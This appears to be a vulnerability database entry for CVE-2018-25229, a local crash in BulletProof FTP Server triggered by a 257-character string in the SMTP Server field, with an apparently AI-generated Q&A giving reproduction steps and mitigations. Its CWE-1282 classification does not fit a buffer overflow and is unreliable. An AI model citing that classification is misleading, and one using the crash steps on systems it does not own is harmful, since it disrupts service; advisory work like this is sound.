CVE-2018-25229
Buffer Overflow in BulletProof FTP SMTP Interface Causes DoS
Publication date: 2026-03-30
Last updated on: 2026-03-31
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| bpftpserver | bulletproof_ftp_server | 2019.0.0.50 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-1282 | Immutable data, such as a first-stage bootloader, device identifiers, and "write-once" configuration settings are stored in writable memory that can be re-programmed or updated in the field. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2018-25229 is a denial of service vulnerability in BulletProof FTP Server version 2019.0.0.50. It exists in the SMTP configuration interface where local attackers can crash the application by inputting an oversized string.
Specifically, by entering a buffer of 257 'A' characters into the SMTP Server field and clicking the Test button, the application crashes due to improper input validation and buffer handling, causing a buffer overflow condition.
How can this vulnerability impact me? :
This vulnerability can cause the BulletProof FTP Server application to crash, resulting in a denial of service condition.
Since the attack requires local access and user interaction, an attacker with local access can disrupt the availability of the FTP server by triggering this crash.
The impact is limited to denial of service; it does not affect confidentiality or integrity of data.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to reproduce the denial of service condition in the BulletProof FTP Server application. Specifically, you can test the SMTP Server configuration interface by inputting an oversized string of 257 'A' characters into the SMTP Server field and then clicking the Test button.
A practical method involves creating a text file containing 257 'A' characters, copying this string to the clipboard, and pasting it into the SMTP Server input field within the application's settings.
There is no specific network command to detect this vulnerability remotely since it requires local interaction with the application's GUI. However, the exploit can be scripted, as demonstrated by a Python script that generates the malicious input.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability immediately, avoid inputting oversized strings (specifically 257 or more characters) into the SMTP Server field in the BulletProof FTP Server settings.
Restrict local user access to the BulletProof FTP Server application to prevent untrusted users from interacting with the SMTP configuration interface.
Monitor for application crashes related to the SMTP Server settings and consider disabling or limiting the use of the SMTP configuration interface if possible until a patch or update is available.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify any direct impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.